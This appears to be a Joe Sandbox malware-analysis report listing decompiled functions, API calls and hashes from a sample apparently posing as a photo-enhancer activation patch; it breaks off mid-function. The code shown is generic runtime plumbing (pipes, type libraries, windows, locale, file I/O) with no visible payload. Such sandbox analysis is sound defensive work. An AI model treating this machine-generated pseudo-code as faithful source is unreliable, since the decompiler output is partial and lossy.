Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: ed5e1d45ac9973ee0f07f934d57a4fe524cf0ba1ee310df62ebcfe77385b1581
Instruction ID: 5546c7ca55dac75a37d5be63b5862a2b7bf7fa91672d6aed0c393ab4f47302e1
Opcode Fuzzy Hash: ed5e1d45ac9973ee0f07f934d57a4fe524cf0ba1ee310df62ebcfe77385b1581
Instruction Fuzzy Hash: 5821B0B67006146BD300AB68CC41F3B76D9DB84B01F08452EF944DB382EA79ED018B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004594AC Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127
pipeCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004594AC(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v8;
				long _v12;
				void* _v16;
				struct _OVERLAPPED _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _t85;
				intOrPtr _t97;
				intOrPtr _t99;
				void* _t104;
				void* _t105;
				intOrPtr _t106;

				_t104 = _t105;
				_t106 = _t105 + 0xffffffd8;
				_v40 = 0;
				_v44 = 0;
				_v8 = __eax;
				_push(_t104);
				_push(0x4596ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				 *(_v8 + 0x14) =  *(_v8 + 0x14) + 1;
				 *(_v8 + 0x20) =  *(_v8 + 0x14);
				 *((intOrPtr*)(_v8 + 0x24)) = __edx;
				 *((intOrPtr*)(_v8 + 0x28)) = __ecx;
				_t85 = 0xc + __ecx;
				_push(_t104);
				_push(0x45968b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t106;
				_v16 = CreateEventA(0, 1, 0, 0);
				if(_v16 == 0) {
					E00453C98("CreateEvent");
				}
				_push(_t104);
				_push(0x459620);
				_push( *[fs:edx]);
				 *[fs:edx] = _t106;
				E00402934( &_v36, 0x14);
				_v36.hEvent = _v16;
				if(TransactNamedPipe( *(_v8 + 0xc), _v8 + 0x20, _t85, _v8 + 0x4034, 0x14,  &_v12,  &_v36) != 0) {
					_pop(_t97);
					 *[fs:eax] = _t97;
					_push(E00459627);
					return CloseHandle(_v16);
				} else {
					if(GetLastError() != 0x3e5) {
						E00453C98("TransactNamedPipe");
					}
					_push(_t104);
					_push(0x4595f2);
					_push( *[fs:edx]);
					 *[fs:edx] = _t106;
					if(_a4 != 0 &&  *((short*)(_v8 + 0x1a)) != 0) {
						do {
							 *((intOrPtr*)(_v8 + 0x18))();
						} while (MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0xff) == 1);
					}
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004595F9);
					GetOverlappedResult( *(_v8 + 0xc),  &_v36,  &_v12, 1);
					return GetLastError();
				}
			}

0x004594ad
0x004594af
0x004594b7
0x004594ba
0x004594bd
0x004594c2
0x004594c3
0x004594c8
0x004594cb
0x004594d1
0x004594dd
0x004594e3
0x004594e9
0x004594f1
0x004594f5
0x004594f6
0x004594fb
0x004594fe
0x0045950e
0x00459515
0x0045951c
0x0045951c
0x00459523
0x00459524
0x00459529
0x0045952c
0x00459539
0x00459541
0x0045956d
0x0045960b
0x0045960e
0x00459611
0x0045961f
0x00459573
0x0045957d
0x00459584
0x00459584
0x0045958b
0x0045958c
0x00459591
0x00459594
0x0045959b
0x004595a7
0x004595ad
0x004595c4
0x004595a7
0x004595c9
0x004595cc
0x004595cf
0x004595e5
0x004595f1
0x004595f1

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045968B,?,00000000,004596EE,?,?,0225386C,00000000), ref: 00459509
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,0225386C,?,00000000,00459620,?,00000000,00000001,00000000,00000000,00000000,0045968B), ref: 00459566
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,0225386C,?,00000000,00459620,?,00000000,00000001,00000000,00000000,00000000,0045968B), ref: 00459573
MsgWaitForMultipleObjects.USER32 ref: 004595BF
GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004595F9,?,-00000020,0000000C,-00004034,00000014,0225386C,?,00000000,00459620,?,00000000), ref: 004595E5
GetLastError.KERNEL32(?,?,00000000,00000001,004595F9,?,-00000020,0000000C,-00004034,00000014,0225386C,?,00000000,00459620,?,00000000), ref: 004595EC

Part of subcall function 00453C98: GetLastError.KERNEL32(00000000,0045482D,00000005,00000000,00454862,?,?,00000000,0049E62C,00000004,00000000,00000000,00000000,?,0049B229,00000000), ref: 00453C9B

Strings

TransactNamedPipe, xrefs: 0045957F
CreateEvent, xrefs: 00459517

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: 3838fa40a1deebe970fde6eca78008ca9f4db9c6a92df26a9d5781284d1f31ce
Instruction ID: 5e3c9d9fc8331b786f0ce76ad2fce8520c17318b204ac54c9f287bbe44ec3061
Opcode Fuzzy Hash: 3838fa40a1deebe970fde6eca78008ca9f4db9c6a92df26a9d5781284d1f31ce
Instruction Fuzzy Hash: 8B418D71A00608FFDB05DFA5C981F9EB7F9EB48714F1140A6F900E7692D6789E54CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00457550 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00457550(void* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr _t28;
				intOrPtr* _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr* _t37;
				intOrPtr* _t50;
				intOrPtr _t62;
				intOrPtr* _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;

				_t71 = _t72;
				_t73 = _t72 + 0xfffffff0;
				_v20 = 0;
				_t69 = __eax;
				_push(_t71);
				_push(0x4576b5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73;
				_t67 = GetProcAddress(GetModuleHandleA("OLEAUT32.DLL"), "UnRegisterTypeLib");
				_t50 = _t67;
				if(_t67 == 0) {
					E00453C98("GetProcAddress");
				}
				E0042CC94(_t69,  &_v20);
				_v8 = E00403CA4(_v20);
				if(_v8 == 0) {
					E00409090();
				}
				_push(_t71);
				_push(0x457698);
				_push( *[fs:edx]);
				 *[fs:edx] = _t73;
				_push( &_v12);
				_t28 = _v8;
				_push(_t28);
				L0042D0F4();
				_t76 = _t28;
				if(_t28 != 0) {
					E00453CAC("LoadTypeLib", _t50, _t28, _t67, _t69, _t76);
				}
				 *[fs:edx] = _t73;
				_t30 = _v12;
				_t32 =  *((intOrPtr*)( *_t30 + 0x1c))(_t30,  &_v16,  *[fs:edx], 0x45767a, _t71);
				_t77 = _t32;
				if(_t32 != 0) {
					E00453CAC("ITypeLib::GetLibAttr", _t50, _t32, _t67, _t69, _t77);
				}
				 *[fs:edx] = _t73;
				_t33 = _v16;
				_t34 =  *_t50(_t33,  *((intOrPtr*)(_t33 + 0x18)),  *((intOrPtr*)(_t33 + 0x1a)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *[fs:edx], 0x45765c, _t71);
				_t78 = _t34;
				if(_t34 != 0) {
					E00453CAC("UnRegisterTypeLib", _t50, _t34, _t67, _t69, _t78);
				}
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t37 = _v12;
				return  *((intOrPtr*)( *_t37 + 0x30))(_t37, _v16, E00457663);
			}

0x00457551
0x00457553
0x0045755b
0x0045755e
0x00457562
0x00457563
0x00457568
0x0045756b
0x00457583
0x00457585
0x00457589
0x00457590
0x00457590
0x0045759a
0x004575a7
0x004575ae
0x004575b0
0x004575b0
0x004575b7
0x004575b8
0x004575bd
0x004575c0
0x004575c6
0x004575c7
0x004575ca
0x004575cb
0x004575d0
0x004575d2
0x004575db
0x004575db
0x004575eb
0x004575f2
0x004575f8
0x004575fb
0x004575fd
0x00457606
0x00457606
0x00457616
0x00457619
0x0045762f
0x00457631
0x00457633
0x0045763c
0x0045763c
0x00457643
0x00457646
0x00457652
0x0045765b

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,004576B5,?,?,00000031,?), ref: 00457578
GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 0045757E
LoadTypeLib.OLEAUT32(00000000,?), ref: 004575CB

Part of subcall function 00453C98: GetLastError.KERNEL32(00000000,0045482D,00000005,00000000,00454862,?,?,00000000,0049E62C,00000004,00000000,00000000,00000000,?,0049B229,00000000), ref: 00453C9B

Strings

OLEAUT32.DLL, xrefs: 00457573
UnRegisterTypeLib, xrefs: 0045756E
GetProcAddress, xrefs: 0045758B
LoadTypeLib, xrefs: 004575D6
UnRegisterTypeLib, xrefs: 00457637
ITypeLib::GetLibAttr, xrefs: 00457601

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: ff49ab651ffec048b27d6f6959800377bf6d0acb4d7fd8ae53fc314732ae47ad
Instruction ID: 6576a6400b1684fe66b120d0c5268abc33dc5c30e9c8dd9853542a513f4dec10
Opcode Fuzzy Hash: ff49ab651ffec048b27d6f6959800377bf6d0acb4d7fd8ae53fc314732ae47ad
Instruction Fuzzy Hash: 2931B471604A04AFC711EFAADC41E5B77ADEB8C7157108476F804D3652DA38D904C728

Uniqueness

Uniqueness Score: -1.00%

Function 0042FA40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0042FA40(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t10;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t24;
				intOrPtr _t26;
				void* _t38;
				intOrPtr _t40;
				void* _t43;
				struct HWND__* _t45;
				struct HWND__* _t46;
				intOrPtr _t48;
				intOrPtr _t49;

				_t44 = __esi;
				_t38 = __edx;
				_t48 = _t49;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(__edx != 0) {
					_t49 = _t49 + 0xfffffff0;
					_t10 = E00402D30(_t10, _t48);
				}
				_t43 = _t10;
				_push(_t48);
				_push(0x42fb4f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49;
				E00402B30(0);
				 *((intOrPtr*)(_t43 + 0xc)) = GetActiveWindow();
				 *((intOrPtr*)(_t43 + 0x10)) = GetFocus();
				 *((intOrPtr*)(_t43 + 0x14)) = E0041F334(0, _t38, _t43, _t44);
				if( *0x49e69a == 0) {
					 *0x49e69a = RegisterClassA(0x49c7ac);
				}
				if( *0x49e69a != 0) {
					_t22 =  *0x49e014; // 0x400000
					_t45 = CreateWindowExA(0, "TWindowDisabler-Window", 0x42fb6c, 0x88000000, 0, 0, 0, 0, 0, 0, _t22, 0);
					 *(_t43 + 8) = _t45;
					if(_t45 != 0) {
						_t24 =  *0x49e014; // 0x400000
						_t5 = _t43 + 8; // 0x61736944
						_t6 =  &_v8; // 0x49e62c
						_t26 =  *0x49e62c; // 0x2252410
						E0042470C(_t26, _t6);
						_t7 =  &_v8; // 0x49e62c
						_t46 = CreateWindowExA(0, "TWindowDisabler-Window", E00403738( *_t7), 0x80000000, 0, 0, 0, 0,  *_t5, 0, _t24, 0);
						 *(_t43 + 4) = _t46;
						if(_t46 != 0) {
							ShowWindow(_t46, 8);
						}
					}
				}
				SetFocus(0);
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E0042FB56);
				_t9 =  &_v8; // 0x49e62c
				return E00403400(_t9);
			}

0x0042fa40
0x0042fa40
0x0042fa41
0x0042fa43
0x0042fa45
0x0042fa46
0x0042fa47
0x0042fa4a
0x0042fa4c
0x0042fa4f
0x0042fa4f
0x0042fa56
0x0042fa5a
0x0042fa5b
0x0042fa60
0x0042fa63
0x0042fa6a
0x0042fa74
0x0042fa7c
0x0042fa86
0x0042fa91
0x0042fa9d
0x0042fa9d
0x0042faab
0x0042fab3
0x0042fadb
0x0042fadd
0x0042fae2
0x0042fae6
0x0042faee
0x0042faff
0x0042fb02
0x0042fb07
0x0042fb0c
0x0042fb21
0x0042fb23
0x0042fb28
0x0042fb2d
0x0042fb2d
0x0042fb28
0x0042fae2
0x0042fb34
0x0042fb3b
0x0042fb3e
0x0042fb41
0x0042fb46
0x0042fb4e

APIs

GetActiveWindow.USER32 ref: 0042FA6F
GetFocus.USER32(00000000,0042FB4F,?,?,?,00000001,00000000,?,00458BE2,00000000,0049E62C), ref: 0042FA77
RegisterClassA.USER32 ref: 0042FA98
CreateWindowExA.USER32 ref: 0042FAD6
CreateWindowExA.USER32 ref: 0042FB1C
ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042FB2D
SetFocus.USER32(00000000,00000000,0042FB4F,?,?,?,00000001,00000000,?,00458BE2,00000000,0049E62C), ref: 0042FB34

Strings

TWindowDisabler-Window, xrefs: 0042FACF, 0042FB15
,I, xrefs: 0042FB46, 0042FAFF, 0042FB0C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$CreateFocus$ActiveClassRegisterShow
String ID: ,I$TWindowDisabler-Window
API String ID: 3167913817-1404624659
Opcode ID: 24ffb5fbcd7dd1ef6c63b7291c4452f377a861dd0971578668a22e4c8ebfd3f1
Instruction ID: a62ceaa4fb40b7d97b276e036e96e71c03e0c95da72a7b9a05d0a528f526b251
Opcode Fuzzy Hash: 24ffb5fbcd7dd1ef6c63b7291c4452f377a861dd0971578668a22e4c8ebfd3f1
Instruction Fuzzy Hash: A9218171B80710BAE210EB66DD13F1A7AA4EB14B04FE1413BF604BB2D1D7B97D0586AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042E8A8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0042E8A8(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t50;
				intOrPtr _t64;
				void* _t72;

				_v20 = 0;
				_v12 = 0;
				_push(_t72);
				_push(0x42e9ad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t72 + 0xfffffff0;
				_t50 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetUserDefaultUILanguage");
				if(_t50 == 0) {
					if( *0x49c0dc != 2) {
						if(E0042E2AC(0, "Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v8, 1, 0) == 0) {
							E0042E1DC();
							RegCloseKey(_v8);
						}
					} else {
						if(E0042E2AC(0, ".DEFAULT\\Control Panel\\International", 0x80000003,  &_v8, 1, 0) == 0) {
							E0042E1DC();
							RegCloseKey(_v8);
						}
					}
					E00403494( &_v20, 0x42ea50);
					E0040357C( &_v20, _v12);
					E004029D8(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t50();
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E0042E9B4);
				E00403400( &_v20);
				return E00403400( &_v12);
			}

0x0042e8b3
0x0042e8b6
0x0042e8bb
0x0042e8bc
0x0042e8c1
0x0042e8c4
0x0042e8dc
0x0042e8e0
0x0042e8f2
0x0042e947
0x0042e954
0x0042e95d
0x0042e95d
0x0042e8f4
0x0042e90f
0x0042e91c
0x0042e925
0x0042e925
0x0042e90f
0x0042e96a
0x0042e975
0x0042e980
0x0042e98b
0x0042e98b
0x0042e8e2
0x0042e8e2
0x0042e8e4
0x0042e991
0x0042e994
0x0042e997
0x0042e99f
0x0042e9ac

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E9AD,?,00000000,00480920,00000000), ref: 0042E8D1
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E8D7
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E9AD,?,00000000,00480920,00000000), ref: 0042E925

Strings

Locale, xrefs: 0042E914
Control Panel\Desktop\ResourceLocale, xrefs: 0042E934
.DEFAULT\Control Panel\International, xrefs: 0042E8FC
GetUserDefaultUILanguage, xrefs: 0042E8C7
kernel32.dll, xrefs: 0042E8CC

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 87b4461b7e86ce2d6717f7211101c23f211bba0a86979a7a1627f41e5905d31e
Instruction ID: cdd838938204d4cbb06352ad172040986bb4042bf6ca521554dfda5889237b72
Opcode Fuzzy Hash: 87b4461b7e86ce2d6717f7211101c23f211bba0a86979a7a1627f41e5905d31e
Instruction Fuzzy Hash: 7F212170B00229AFDB50EBA7DC46BAE77A9EB04304F904477A500E7291DB7C9E45DB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00417210 Relevance: 15.2, APIs: 10, Instructions: 167
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417210(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t77;
				int _t130;
				void* _t131;
				void* _t152;
				void* _t153;
				void* _t154;
				struct HDC__* _t155;

				_v60.right = __ecx;
				_t155 = __edx;
				_t152 = __eax;
				_t76 =  *((intOrPtr*)(__eax + 0xb0));
				if( *((intOrPtr*)(__eax + 0xb0)) == 0) {
					L13:
					_t77 =  *(_t152 + 0xb4);
					if(_t77 == 0) {
						L23:
						return _t77;
					}
					_t77 =  *((intOrPtr*)(_t77 + 8)) - 1;
					if(_t77 < 0) {
						goto L23;
					}
					_v44.right = _t77 + 1;
					_t153 = 0;
					do {
						_t77 = E0040B6DC( *(_t152 + 0xb4), _t153);
						_t130 = _t77;
						if( *((char*)(_t130 + 0xc5)) != 0 && ( *(_t130 + 0x34) & 0x00000010) != 0 && ( *((char*)(_t130 + 0x37)) != 0 || ( *(_t130 + 0x1c) & 0x00000010) != 0 && ( *(_t130 + 0x35) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041A4E8(0x80000010));
							E0040AED8( *((intOrPtr*)(_t130 + 0x24)) - 1,  *((intOrPtr*)(_t130 + 0x24)) +  *((intOrPtr*)(_t130 + 0x2c)),  *((intOrPtr*)(_t130 + 0x28)) - 1,  &(_v44.right),  *((intOrPtr*)(_t130 + 0x28)) +  *((intOrPtr*)(_t130 + 0x30)));
							FrameRect(_t155,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041A4E8(0x80000014));
							E0040AED8( *((intOrPtr*)(_t130 + 0x24)),  *((intOrPtr*)(_t130 + 0x24)) +  *((intOrPtr*)(_t130 + 0x2c)) + 1,  *((intOrPtr*)(_t130 + 0x28)),  &(_v60.right),  *((intOrPtr*)(_t130 + 0x28)) +  *((intOrPtr*)(_t130 + 0x30)) + 1);
							FrameRect(_t155,  &_v60, _v60);
							_t77 = DeleteObject(_v68);
						}
						_t153 = _t153 + 1;
						_t73 =  &(_v44.right);
						 *_t73 = _v44.right - 1;
					} while ( *_t73 != 0);
					goto L23;
				}
				_t154 = 0;
				if(_v60.right != 0) {
					_t154 = E0040B724(_t76, _v60.right);
					if(_t154 < 0) {
						_t154 = 0;
					}
				}
				_v60.bottom =  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0xb0)) + 8));
				if(_t154 >= _v60.bottom) {
					goto L13;
				} else {
					goto L5;
				}
				do {
					L5:
					_t131 = E0040B6DC( *((intOrPtr*)(_t152 + 0xb0)), _t154);
					if( *((char*)(_t131 + 0x37)) != 0 || ( *(_t131 + 0x1c) & 0x00000010) != 0 && ( *(_t131 + 0x35) & 0x00000004) == 0) {
						E0040AED8( *((intOrPtr*)(_t131 + 0x24)),  *((intOrPtr*)(_t131 + 0x24)) +  *(_t131 + 0x2c),  *((intOrPtr*)(_t131 + 0x28)),  &(_v44.bottom),  *((intOrPtr*)(_t131 + 0x28)) +  *(_t131 + 0x30));
						if(RectVisible(_t155,  &(_v44.top)) != 0) {
							if(( *(_t152 + 0x36) & 0x00000080) != 0) {
								 *(_t131 + 0x36) =  *(_t131 + 0x36) | 0x00000080;
							}
							_v60.top = SaveDC(_t155);
							E00414648(_t155,  *((intOrPtr*)(_t131 + 0x28)),  *((intOrPtr*)(_t131 + 0x24)));
							IntersectClipRect(_t155, 0, 0,  *(_t131 + 0x2c),  *(_t131 + 0x30));
							E004156D0(_t131, _t155, 0xf, 0);
							RestoreDC(_t155, _v80);
							 *(_t131 + 0x36) =  *(_t131 + 0x36) & 0x0000007f;
						}
					}
					_t154 = _t154 + 1;
				} while (_t154 < _v60.top);
				goto L13;
			}

0x00417217
0x0041721a
0x0041721c
0x0041721e
0x00417226
0x00417309
0x00417309
0x00417311
0x00417416
0x00417416
0x00417416
0x0041731a
0x0041731d
0x00000000
0x00000000
0x00417324
0x00417328
0x0041732a
0x00417332
0x00417337
0x00417340
0x0041737a
0x0041739d
0x004173a8
0x004173b2
0x004173c7
0x004173ea
0x004173f5
0x004173ff
0x004173ff
0x00417404
0x00417405
0x00417405
0x00417405
0x00000000
0x0041732a
0x0041722c
0x00417232
0x0041723c
0x00417240
0x00417242
0x00417242
0x00417240
0x0041724d
0x00417255
0x00000000
0x00000000
0x00000000
0x00000000
0x0041725b
0x0041725b
0x00417268
0x0041726e
0x00417298
0x004172aa
0x004172b0
0x004172b2
0x004172b2
0x004172bc
0x004172c8
0x004172da
0x004172ea
0x004172f5
0x004172fa
0x004172fa
0x004172aa
0x004172fe
0x004172ff
0x00000000

APIs

RectVisible.GDI32(?,?), ref: 004172A3
SaveDC.GDI32(?), ref: 004172B7
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004172DA
RestoreDC.GDI32(?,?), ref: 004172F5
CreateSolidBrush.GDI32(00000000), ref: 00417375
FrameRect.USER32 ref: 004173A8
DeleteObject.GDI32(?), ref: 004173B2
CreateSolidBrush.GDI32(00000000), ref: 004173C2
FrameRect.USER32 ref: 004173F5
DeleteObject.GDI32(?), ref: 004173FF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 7a316312861d082fbd8e62a5330daebe5b298381f07514e629e2879bcfac8b00
Instruction ID: c95a734d2d00aea9c177a3b06cfd5000d642d04c6817e823e80f404ee62f0a93
Opcode Fuzzy Hash: 7a316312861d082fbd8e62a5330daebe5b298381f07514e629e2879bcfac8b00
Instruction Fuzzy Hash: 8B513A716086445FDB51EF69C8C0B9B77E8AF48314F1445AAFD488B287C738EC82CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ABF(void** __eax) {
				void* _t25;
				long _t26;
				void* _t27;
				long _t30;
				void* _t34;
				void* _t36;
				long _t37;
				int _t40;
				void* _t42;
				void* _t48;
				void* _t49;
				long _t50;
				long _t51;
				void* _t54;
				void** _t55;
				DWORD* _t56;

				_t55 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				_t25 =  *((intOrPtr*)(__eax + 4)) - 0xd7b1;
				if(_t25 == 0) {
					_t26 = 0x80000000;
					_t51 = 2;
					_t50 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = E00404A50;
					L8:
					_t55[9] = 0x404aa7;
					_t55[8] = E00404A77;
					if(_t55[0x12] == 0) {
						_t55[9] = E00404A77;
						if(_t55[1] == 0xd7b2) {
							_t27 = GetStdHandle(0xfffffff5);
						} else {
							_t27 = GetStdHandle(0xfffffff6);
						}
						if(_t27 == 0xffffffff) {
							L35:
							_t55[1] = 0xd7b0;
							return GetLastError();
						} else {
							 *_t55 = _t27;
							L28:
							if(_t55[1] == 0xd7b1) {
								L32:
								return 0;
							}
							_t30 = GetFileType( *_t55);
							if(_t30 == 0) {
								CloseHandle( *_t55);
								_t55[1] = 0xd7b0;
								return 0x69;
							}
							if(_t30 == 2) {
								_t55[8] = E00404A7A;
							}
							goto L32;
						}
					}
					_t34 = CreateFileA( &(_t55[0x12]), _t26, _t51, 0, _t50, 0x80, 0);
					if(_t34 == 0xffffffff) {
						goto L35;
					}
					 *_t55 = _t34;
					if(_t55[1] != 0xd7b3) {
						goto L28;
					}
					_t55[1] = _t55[1] - 1;
					_t36 = GetFileSize( *_t55, 0) + 1;
					if(_t36 == 0) {
						goto L35;
					}
					_t37 = _t36 - 0x81;
					if(_t37 < 0) {
						_t37 = 0;
					}
					if(SetFilePointer( *_t55, _t37, 0, 0) + 1 == 0) {
						goto L35;
					} else {
						_t40 = ReadFile( *_t55,  &(_t55[0x53]), 0x80, _t56, 0);
						_t54 = 0;
						if(_t40 != 1) {
							goto L35;
						}
						_t42 = 0;
						while(_t42 < _t54) {
							if( *((char*)(_t55 + _t42 + 0x14c)) == 0x1a) {
